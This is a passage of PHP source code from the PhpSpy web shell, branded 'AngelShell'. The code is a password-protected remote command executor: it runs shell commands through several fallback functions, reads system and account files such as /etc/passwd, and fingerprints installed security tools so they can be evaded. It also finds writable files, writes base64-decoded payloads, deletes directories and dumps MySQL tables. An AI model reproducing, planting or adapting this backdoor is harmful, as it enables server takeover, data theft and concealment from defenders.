1489 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1490 15 => array('enable_dl',getcfg('enable_dl')),
1491 16 => array('display_errors',getcfg('display_errors')),
1492 17 => array('register_globals',getcfg('register_globals')),
1493 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1494 19 => array('memory_limit',getcfg('memory_limit')),
1495 20 => array('post_max_size',getcfg('post_max_size')),
1496 21 => array('upload_max_filesize',$upsize),
1497 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1498 23 => array('disable_functions',$dis_func),
1499 );
1500
1501 if($phpvarname) {
1502 m($phpvarname .' : '.getcfg($phpvarname));
1503 }
1504
1505 formhead(array('title'=>'Server environment'));
1506 makehide('action','phpenv');
1507 makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
1508 formfooter();
1509
1510 $hp = array(0=> 'Server', 1=> 'PHP');
1511 for($a=0;$a<2;$a++) {
1512 p('<h2>'.$hp[$a].' »</h2>');
1513 p('<ul class="info">');
1514 if ($a==0) {
1515 for($i=1;$i<=9;$i++) {
1516 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1517 }
1518 } elseif ($a == 1) {
1519 for($i=10;$i<=23;$i++) {
1520 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1521 }
1522 }
1523 p('</ul>');
1524 }
1525}//end phpenv
1526
1527elseif ($action == 'secinfo') {
1528
1529 secparam('Server software', @getenv('SERVER_SOFTWARE'));
1530 secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
1531 secparam('Open base dir', @ini_get('open_basedir'));
1532 secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1533 secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1534 secparam('cURL support', function_exists('curl_version')?'enabled':'no');
1535 $temp=array();
1536 if(function_exists('mysql_get_client_info'))
1537 $temp[] = "MySql (".mysql_get_client_info().")";
1538 if(function_exists('mssql_connect'))
1539 $temp[] = "MSSQL";
1540 if(function_exists('pg_connect'))
1541 $temp[] = "PostgreSQL";
1542 if(function_exists('oci_connect'))
1543 $temp[] = "Oracle";
1544 secparam('Supported databases', implode(', ', $temp));
1545
1546 if( !IS_WIN ) {
1547 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1548 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1549 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1550 secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
1551 secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
1552 secparam('OS version', @file_get_contents('/proc/version'));
1553 secparam('Distr name', @file_get_contents('/etc/issue.net'));
1554 $safe_mode = @ini_get('safe_mode');
1555 if(!$GLOBALS['safe_mode']) {
1556 $temp=array();
1557 foreach ($userful as $item)
1558 if(which($item)){$temp[]=$item;}
1559 secparam('Userful', implode(', ',$temp));
1560 $temp=array();
1561 foreach ($danger as $item)
1562 if(which($item)){$temp[]=$item;}
1563 secparam('Danger', implode(', ',$temp));
1564 $temp=array();
1565 foreach ($downloaders as $item)
1566 if(which($item)){$temp[]=$item;}
1567 secparam('Downloaders', implode(', ',$temp));
1568 secparam('Hosts', @file_get_contents('/etc/hosts'));
1569 secparam('HDD space', execute('df -h'));
1570 secparam('Mount options', @file_get_contents('/etc/fstab'));
1571 }
1572 } else {
1573 secparam('OS Version',execute('ver'));
1574 secparam('Account Settings',execute('net accounts'));
1575 secparam('User Accounts',execute('net user'));
1576 secparam('IP Configurate',execute('ipconfig -all'));
1577 }
1578}//end
1579
1580else {
1581 m('Undefined Action');
1582}
1583
1584?>
1585</td></tr></table>
1586<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
1587 <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1588 Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
1589</div>
1590</body>
1591</html>
1592
1593<?php
1594
1595/*======================================================
1596???
1597======================================================*/
1598
1599function secparam($n, $v) {
1600 $v = trim($v);
1601 if($v) {
1602 p('<h2>'.$n.' »</h2>');
1603 p('<div class="infolist">');
1604 if(strpos($v, "\n") === false)
1605 p($v.'<br />');
1606 else
1607 p('<pre>'.$v.'</pre>');
1608 p('</div>');
1609 }
1610}
1611function m($msg) {
1612 echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
1613 echo $msg;
1614 echo '</div>';
1615}
1616function scookie($key, $value, $life = 0, $prefix = 1) {
1617 global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
1618 $key = ($prefix ? $cookiepre : '').$key;
1619 $life = $life ? $life : $cookielife;
1620 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1621 setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
1622}
1623function multi($num, $perpage, $curpage, $tablename) {
1624 $multipage = '';
1625 if($num > $perpage) {
1626 $page = 10;
1627 $offset = 5;
1628 $pages = @ceil($num / $perpage);
1629 if($page > $pages) {
1630 $from = 1;
1631 $to = $pages;
1632 } else {
1633 $from = $curpage - $offset;
1634 $to = $curpage + $page - $offset - 1;
1635 if($from < 1) {
1636 $to = $curpage + 1 - $from;
1637 $from = 1;
1638 if(($to - $from) < $page && ($to - $from) < $pages) {
1639 $to = $page;
1640 }
1641 } elseif($to > $pages) {
1642 $from = $curpage - $pages + $to;
1643 $to = $pages;
1644 if(($to - $from) < $page && ($to - $from) < $pages) {
1645 $from = $pages - $page + 1;
1646 }
1647 }
1648 }
1649 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
1650 for($i = $from; $i <= $to; $i++) {
1651 $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
1652 }
1653 $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
1654 $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
1655 }
1656 return $multipage;
1657}
1658// ????
1659function loginpage() {
1660?>
1661 <style type="text/css">
1662 input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
1663 </style>
1664 <form method="POST" action="">
1665 <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
1666 <input type="hidden" name="action" value="login">
1667 <input type="submit" value="Login">
1668 </form>
1669<?php
1670echo "AngelShell";
1671 exit;
1672}//end loginpage()
1673
1674function execute($cfe) {
1675 $res = '';
1676 if ($cfe) {
1677 if(function_exists('system')) {
1678 @ob_start();
1679 @system($cfe);
1680 $res = @ob_get_contents();
1681 @ob_end_clean();
1682 } elseif(function_exists('passthru')) {
1683 @ob_start();
1684 @passthru($cfe);
1685 $res = @ob_get_contents();
1686 @ob_end_clean();
1687 } elseif(function_exists('shell_exec')) {
1688 $res = @shell_exec($cfe);
1689 } elseif(function_exists('exec')) {
1690 @exec($cfe,$res);
1691 $res = join("\n",$res);
1692 } elseif(@is_resource($f = @popen($cfe,"r"))) {
1693 $res = '';
1694 while(!@feof($f)) {
1695 $res .= @fread($f,1024);
1696 }
1697 @pclose($f);
1698 }
1699 }
1700 return $res;
1701}
1702function which($pr) {
1703 $path = execute("which $pr");
1704 return ($path ? $path : $pr);
1705}
1706
1707function cf($fname,$text){
1708 if($fp=@fopen($fname,'w')) {
1709 @fputs($fp,@base64_decode($text));
1710 @fclose($fp);
1711 }
1712}
1713function dirsize($dir) {
1714 $dh = @opendir($dir);
1715 $size = 0;
1716 while($file = @readdir($dh)) {
1717 if ($file != '.' && $file != '..') {
1718 $path = $dir.'/'.$file;
1719 $size += @is_dir($path) ? dirsize($path) : @filesize($path);
1720 }
1721 }
1722 @closedir($dh);
1723 return $size;
1724}
1725// ??????
1726function debuginfo() {
1727 global $starttime;
1728 $mtime = explode(' ', microtime());
1729 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1730 echo 'Processed in '.$totaltime.' second(s)';
1731}
1732
1733//??MYSQL???
1734function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
1735 global $charsetdb;
1736 @ini_set('mysql.connect_timeout', 5);
1737 if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
1738 p('<h2>Can not connect to MySQL server</h2>');
1739 exit;
1740 }
1741 if($link && $dbname) {
1742 if (!@mysql_select_db($dbname, $link)) {
1743 p('<h2>Database selected has error</h2>');
1744 exit;
1745 }
1746 }
1747 if($link && mysql_get_server_info() > '4.1') {
1748 if($charset && in_array(strtolower($charset), $charsetdb)) {
1749 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1750 }
1751 }
1752 return $link;
1753}
1754
1755// ??????
1756function s_array(&$array) {
1757 if (is_array($array)) {
1758 foreach ($array as $k => $v) {
1759 $array[$k] = s_array($v);
1760 }
1761 } else if (is_string($array)) {
1762 $array = stripslashes($array);
1763 }
1764 return $array;
1765}
1766
1767// ??HTML??
1768function html_clean($content) {
1769 $content = htmlspecialchars($content);
1770 $content = str_replace("\n", "<br />", $content);
1771 $content = str_replace(" ", " ", $content);
1772 $content = str_replace("\t", " ", $content);
1773 return $content;
1774}
1775
1776// ????
1777function getChmod($filepath){
1778 return substr(base_convert(@fileperms($filepath),10,8),-4);
1779}
1780
1781function getPerms($filepath) {
1782 $mode = @fileperms($filepath);
1783 if (($mode & 0xC000) === 0xC000) {$type = 's';}
1784 elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1785 elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1786 elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
1787 elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1788 elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1789 elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1790 else {$type = '?';}
1791
1792 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1793 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1794 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1795 $group['read'] = ($mode & 00040) ? 'r' : '-';
1796 $group['write'] = ($mode & 00020) ? 'w' : '-';
1797 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1798 $world['read'] = ($mode & 00004) ? 'r' : '-';
1799 $world['write'] = ($mode & 00002) ? 'w' : '-';
1800 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1801
1802 if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1803 if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1804 if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1805
1806 return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1807}
1808
1809function getUser($filepath) {
1810 if (function_exists('posix_getpwuid')) {
1811 $array = @posix_getpwuid(@fileowner($filepath));
1812 if ($array && is_array($array)) {
1813 return ' / <a href="#" title="User: '.$array['name'].'
Passwd: '.$array['passwd'].'
Uid: '.$array['uid'].'
gid: '.$array['gid'].'
Gecos: '.$array['gecos'].'
Dir: '.$array['dir'].'
Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1814 }
1815 }
1816 return '';
1817}
1818
1819// ????
1820function deltree($deldir) {
1821 $mydir=@dir($deldir);
1822 while($file=$mydir->read()) {
1823 if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
1824 @chmod($deldir.'/'.$file,0777);
1825 deltree($deldir.'/'.$file);
1826 }
1827 if (is_file($deldir.'/'.$file)) {
1828 @chmod($deldir.'/'.$file,0777);
1829 @unlink($deldir.'/'.$file);
1830 }
1831 }
1832 $mydir->close();
1833 @chmod($deldir,0777);
1834 return @rmdir($deldir) ? 1 : 0;
1835}
1836
1837// ??????????
1838function bg() {
1839 global $bgc;
1840 return ($bgc++%2==0) ? 'alt1' : 'alt2';
1841}
1842
1843// ???????????
1844function getPath($scriptpath, $nowpath) {
1845 if ($nowpath == '.') {
1846 $nowpath = $scriptpath;
1847 }
1848 $nowpath = str_replace('\\', '/', $nowpath);
1849 $nowpath = str_replace('//', '/', $nowpath);
1850 if (substr($nowpath, -1) != '/') {
1851 $nowpath = $nowpath.'/';
1852 }
1853 return $nowpath;
1854}
1855
1856// ???????????
1857function getUpPath($nowpath) {
1858 $pathdb = explode('/', $nowpath);
1859 $num = count($pathdb);
1860 if ($num > 2) {
1861 unset($pathdb[$num-1],$pathdb[$num-2]);
1862 }
1863 $uppath = implode('/', $pathdb).'/';
1864 $uppath = str_replace('//', '/', $uppath);
1865 return $uppath;
1866}
1867
1868// ??PHP????
1869function getcfg($varname) {
1870 $result = get_cfg_var($varname);
1871 if ($result == 0) {
1872 return 'No';
1873 } elseif ($result == 1) {
1874 return 'Yes';
1875 } else {
1876 return $result;
1877 }
1878}
1879
1880// ??????
1881function getfun($funName) {
1882 return (false !== function_exists($funName)) ? 'Yes' : 'No';
1883}
1884
1885// ???????
1886function getext($file) {
1887 $info = pathinfo($file);
1888 return $info['extension'];
1889}
1890
1891function GetWDirList($dir){
1892 global $dirdata,$j,$nowpath;
1893 !$j && $j=1;
1894 if ($dh = opendir($dir)) {
1895 while ($file = readdir($dh)) {
1896 $f=str_replace('//','/',$dir.'/'.$file);
1897 if($file!='.' && $file!='..' && is_dir($f)){
1898 if (is_writable($f)) {
1899 $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
1900 $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1901 $dirdata[$j]['dirchmod']=getChmod($f);
1902 $dirdata[$j]['dirperm']=getPerms($f);
1903 $dirdata[$j]['dirlink']=$dir;
1904 $dirdata[$j]['server_link']=$f;
1905 $j++;
1906 }
1907 GetWDirList($f);
1908 }
1909 }
1910 closedir($dh);
1911 clearstatcache();
1912 return $dirdata;
1913 } else {
1914 return array();
1915 }
1916}
1917
1918function GetWFileList($dir){
1919 global $filedata,$j,$nowpath, $writabledb;
1920 !$j && $j=1;
1921 if ($dh = opendir($dir)) {
1922 while ($file = readdir($dh)) {
1923 $ext = getext($file);
1924 $f=str_replace('//','/',$dir.'/'.$file);
1925 if($file!='.' && $file!='..' && is_dir($f)){
1926 GetWFileList($f);
1927 } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
1928 if (is_writable($f)) {
1929 $filedata[$j]['filename']=str_replace($nowpath,'',$f);
1930 $filedata[$j]['size']=sizecount(@filesize($f));
1931 $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1932 $filedata[$j]['filechmod']=getChmod($f);
1933 $filedata[$j]['fileperm']=getPerms($f);
1934 $filedata[$j]['fileowner']=getUser($f);
1935 $filedata[$j]['dirlink']=$dir;
1936 $filedata[$j]['server_link']=$f;
1937 $j++;
1938 }
1939 }
1940 }
1941 closedir($dh);
1942 clearstatcache();
1943 return $filedata;
1944 } else {
1945 return array();
1946 }
1947}
1948
1949function GetSFileList($dir, $content, $re = 0) {
1950 global $filedata,$j,$nowpath, $writabledb;
1951 !$j && $j=1;
1952 if ($dh = opendir($dir)) {
1953 while ($file = readdir($dh)) {
1954 $ext = getext($file);
1955 $f=str_replace('//','/',$dir.'/'.$file);
1956 if($file!='.' && $file!='..' && is_dir($f)){
1957 GetSFileList($f, $content, $re = 0);
1958 } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
1959 $find = 0;
1960 if ($re) {
1961 if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){
1962 $find = 1;
1963 }
1964 } else {
1965 if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {
1966 $find = 1;
1967 }
1968 }
1969 if ($find) {
1970 $filedata[$j]['filename']=str_replace($nowpath,'',$f);
1971 $filedata[$j]['size']=sizecount(@filesize($f));
1972 $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1973 $filedata[$j]['filechmod']=getChmod($f);
1974 $filedata[$j]['fileperm']=getPerms($f);
1975 $filedata[$j]['fileowner']=getUser($f);
1976 $filedata[$j]['dirlink']=$dir;
1977 $filedata[$j]['server_link']=$f;
1978 $j++;
1979 }
1980 }
1981 }
1982 closedir($dh);
1983 clearstatcache();
1984 return $filedata;
1985 } else {
1986 return array();
1987 }
1988}
1989
1990function qy($sql) {
1991 global $mysqllink;
1992 //echo $sql.'<br>';
1993 $res = $error = '';
1994 if(!$res = @mysql_query($sql,$mysqllink)) {
1995 return 0;
1996 } else if(is_resource($res)) {
1997 return 1;
1998 } else {
1999 return 2;
2000 }
2001 return 0;
2002}
2003
2004function q($sql) {
2005 global $mysqllink;
2006 return @mysql_query($sql,$mysqllink);
2007}
2008
2009function fr($qy){
2010 mysql_free_result($qy);
2011}
2012
2013function sizecount($fileSize) {
2014 $size = sprintf("%u", $fileSize);
2015 if($size == 0) {
2016 return '0 Bytes' ;
2017 }
2018 $sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
2019 return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
2020}
2021// ?????
2022function sqldumptable($table, $fp=0) {
2023 global $mysqllink;
2024
2025 $tabledump = "DROP TABLE IF EXISTS `$table`;\n";
2026 $res = q("SHOW CREATE TABLE $table");
2027 $create = mysql_fetch_row($res);
2028 $tabledump .= $create[1].";\n\n";
2029
2030 if ($fp) {
2031 fwrite($fp,$tabledump);
2032 } else {
2033 echo $tabledump;
2034 }
2035 $tabledump = '';
2036 $rows = q("SELECT * FROM $table");
2037 while ($row = mysql_fetch_assoc($rows)) {
2038 foreach($row as $k=>$v) {
2039 $row[$k] = "'".@mysql_real_escape_string($v)."'";
2040 }
2041 $tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";
2042 if ($fp) {
2043 fwrite($fp,$tabledump);
2044 } else {
2045 echo $tabledump;
2046 }
2047 }
2048 fwrite($fp,"\n\n");
2049 fr($rows);
2050}
2051
2052function p($str){
2053 echo $str."\n";
2054}
2055
2056function tbhead() {
2057 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2058}
2059function tbfoot(){
2060 p('</table>');
2061}
2062
2063function makehide($name,$value=''){
2064 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2065}
2066
2067function makeinput($arg = array()){
2068 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2069 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2070 !$arg['type'] && $arg['type'] = 'text';
2071 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2072 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2073 if ($arg['newline']) {
2074 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2075 } else {
2076 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2077 }
2078}
2079
2080function makeselect($arg = array()){
2081 if ($arg['onchange']) {
2082 $onchange = 'onchange="'.$arg['onchange'].'"';
2083 }
2084 $arg['title'] = $arg['title'] ? $arg['title'] : '';
2085 if ($arg['newline']) p('<p>');
2086 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2087 if (is_array($arg['option'])) {
2088 if ($arg['nokey']) {
2089 foreach ($arg['option'] as $value) {
2090 if ($arg['selected']==$value) {
2091 p("<option value=\"$value\" selected>$value</option>");
2092 } else {
2093 p("<option value=\"$value\">$value</option>");
2094 }
2095 }
2096 } else {
2097 foreach ($arg['option'] as $key=>$value) {
2098 if ($arg['selected']==$key) {
2099 p("<option value=\"$key\" selected>$value</option>");
2100 } else {
2101 p("<option value=\"$key\">$value</option>");
2102 }
2103 }
2104 }
2105 }
2106 p("</select>");
2107 if ($arg['newline']) p('</p>');
2108}
2109function formhead($arg = array()) {
2110 global $self;
2111 !$arg['method'] && $arg['method'] = 'post';
2112 !$arg['action'] && $arg['action'] = $self;
2113 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2114 !$arg['name'] && $arg['name'] = 'form1';
2115 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2116 if ($arg['title']) {
2117 p('<h2>'.$arg['title'].' »</h2>');
2118 }
2119}
2120
2121function maketext($arg = array()){
2122 !$arg['cols'] && $arg['cols'] = 100;
2123 !$arg['rows'] && $arg['rows'] = 25;
2124 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2125 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2126}
2127
2128function formfooter($name = ''){
2129 !$name && $name = 'submit';
2130 p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
2131 p('</form>');
2132}
2133
2134function goback(){
2135 global $self, $nowpath;
2136 p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
2137}
2138
2139function formfoot(){
2140 p('</form>');
2141}
2142
2143function encode_pass($pass) {
2144 $pass = md5('angel'.$pass);
2145 $pass = md5($pass.'angel');
2146 $pass = md5('angel'.$pass.'angel');
2147 return $pass;
2148}
2149
2150function pr($s){
2151 echo "<pre>".print_r($s).'</pre>';
2152}
2153
2154?>